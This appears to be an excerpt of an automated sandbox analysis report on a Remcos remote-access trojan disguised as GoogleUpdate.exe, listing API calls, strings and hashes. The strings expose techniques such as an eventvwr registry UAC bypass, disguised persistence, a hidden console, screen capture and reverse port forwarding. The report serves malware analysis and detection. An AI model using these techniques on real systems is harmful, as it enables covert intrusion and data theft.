                                • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 0040549F
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                • TranslateMessage.USER32(?), ref: 0040555E
                                • DispatchMessageA.USER32(?), ref: 00405569
                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                  • Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                • String ID: CloseChat$DisplayMessage$GetMessage
                                • API String ID: 2956720200-749203953
                                • Opcode ID: e03c5fc2276f8e99434d912b06779df6448832c02025eab3f0aa6038bdb2ab6b
                                • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                                • Opcode Fuzzy Hash: e03c5fc2276f8e99434d912b06779df6448832c02025eab3f0aa6038bdb2ab6b
                                • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                • ExitProcess.KERNEL32 ref: 00406782
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteExitProcessShell
                                • String ID: C:\ProgramData\GoogleDat\GoogleUpdate.exe$H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                • API String ID: 1124553745-3476264819
                                • Opcode ID: 54c70ac9d83207f5094eab5ee5734f36b3419636f249737f852e1b3a6bd0f6b0
                                • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                • Opcode Fuzzy Hash: 54c70ac9d83207f5094eab5ee5734f36b3419636f249737f852e1b3a6bd0f6b0
                                • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                                APIs
                                • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                • GetConsoleWindow.KERNEL32 ref: 0041AA63
                                • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ConsoleWindow$AllocShow
                                • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                • API String ID: 3461962499-4025029772
                                • Opcode ID: bb5842c9276b924b84f2b7f99c8538917f0848a2b2f901183b5b0da883229c56
                                • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                • Opcode Fuzzy Hash: bb5842c9276b924b84f2b7f99c8538917f0848a2b2f901183b5b0da883229c56
                                • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: c43c0efbf1c7785281d6f20f7d6db9af9847eaec0a277ab5b5550fdeb31cbd7f
                                • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                • Opcode Fuzzy Hash: c43c0efbf1c7785281d6f20f7d6db9af9847eaec0a277ab5b5550fdeb31cbd7f
                                • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                APIs
                                • _free.LIBCMT ref: 00445645
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 00445651
                                • _free.LIBCMT ref: 0044565C
                                • _free.LIBCMT ref: 00445667
                                • _free.LIBCMT ref: 00445672
                                • _free.LIBCMT ref: 0044567D
                                • _free.LIBCMT ref: 00445688
                                • _free.LIBCMT ref: 00445693
                                • _free.LIBCMT ref: 0044569E
                                • _free.LIBCMT ref: 004456AC
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                APIs
                                • __EH_prolog.LIBCMT ref: 00417F6F
                                • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                • Sleep.KERNEL32(000003E8), ref: 004180B3
                                • GetLocalTime.KERNEL32(?), ref: 004180BB
                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                • API String ID: 489098229-3790400642
                                • Opcode ID: 27fe380cc25d147f7437c47758b362fdae504e3481b31ceb198db4fdc3029009
                                • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                                • Opcode Fuzzy Hash: 27fe380cc25d147f7437c47758b362fdae504e3481b31ceb198db4fdc3029009
                                • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                • Sleep.KERNEL32(00000064), ref: 00415A46
                                • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateDeleteExecuteShellSleep
                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                • API String ID: 1462127192-2001430897
                                • Opcode ID: 0ceb819d51a76422855a49a0a0394dd79b8568c852824c09e20ecbac12c50036
                                • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                • Opcode Fuzzy Hash: 0ceb819d51a76422855a49a0a0394dd79b8568c852824c09e20ecbac12c50036
                                • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                  • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                  • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                  • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                • TranslateMessage.USER32(?), ref: 0041B29E
                                • DispatchMessageA.USER32(?), ref: 0041B2A8
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                • String ID: Remcos
                                • API String ID: 1970332568-165870891
                                • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                                • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 694ad35582159027617efb05aef66a3d5b04e60223d1b3b6b0413602b7ba056d
                                • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                                • Opcode Fuzzy Hash: 694ad35582159027617efb05aef66a3d5b04e60223d1b3b6b0413602b7ba056d
                                • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                                APIs
                                  • Part of subcall function 00452A89: CreateFileW.KERNEL32(00000000,00000000,?,00452E64,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                • __dosmaperr.LIBCMT ref: 00452ED6
                                • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                • __dosmaperr.LIBCMT ref: 00452EF5
                                • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                • GetLastError.KERNEL32 ref: 00453091
                                • __dosmaperr.LIBCMT ref: 00453098
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID:
                                • API String ID: 4237864984-0
                                • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                                • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                                APIs
                                • GetCPInfo.KERNEL32(?,?), ref: 0045100F
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00451092
                                • __alloca_probe_16.LIBCMT ref: 004510CA
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451125
                                • __alloca_probe_16.LIBCMT ref: 00451174
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0045113C
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004511B8
                                • __freea.LIBCMT ref: 004511E3
                                • __freea.LIBCMT ref: 004511EF
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                • String ID:
                                • API String ID: 201697637-0
                                • Opcode ID: 99543cff2907c0b4d34c425deaa11b1fb650b3a063013b5d40be1c299c57468c
                                • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                                • Opcode Fuzzy Hash: 99543cff2907c0b4d34c425deaa11b1fb650b3a063013b5d40be1c299c57468c
                                • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • _memcmp.LIBVCRUNTIME ref: 00442935
                                • _free.LIBCMT ref: 004429A6
                                • _free.LIBCMT ref: 004429BF
                                • _free.LIBCMT ref: 004429F1
                                • _free.LIBCMT ref: 004429FA
                                • _free.LIBCMT ref: 00442A06
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast$_abort_memcmp
                                • String ID: C
                                • API String ID: 1679612858-1037565863
                                • Opcode ID: 7566827e2ed3776f8e8568dfe657035855bda713ddddf546254e360ae98071d6
                                • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                • Opcode Fuzzy Hash: 7566827e2ed3776f8e8568dfe657035855bda713ddddf546254e360ae98071d6
                                • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tcp$udp
                                • API String ID: 0-3725065008
                                • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Eventinet_ntoa
                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                • API String ID: 3578746661-168337528
                                • Opcode ID: 4b0beb5895bf1fb6b761f05e44acef174742dea3257a1ebbcb6f0cf86ef9a86b
                                • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                                • Opcode Fuzzy Hash: 4b0beb5895bf1fb6b761f05e44acef174742dea3257a1ebbcb6f0cf86ef9a86b
                                • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                  • Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16
                                • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateDeleteMoveWritesend
                                • String ID: .part
                                • API String ID: 2057882627-3499674018
                                • Opcode ID: 551b5476aa36853213c23cbc2aeafcd89144a5186fc3414e6e1c0fd1deb8704e
                                • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                • Opcode Fuzzy Hash: 551b5476aa36853213c23cbc2aeafcd89144a5186fc3414e6e1c0fd1deb8704e
                                • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                APIs
                                  • Part of subcall function 00411F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                  • Part of subcall function 00411F91: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                  • Part of subcall function 00411F91: RegCloseKey.KERNEL32(?), ref: 00411FDD
                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
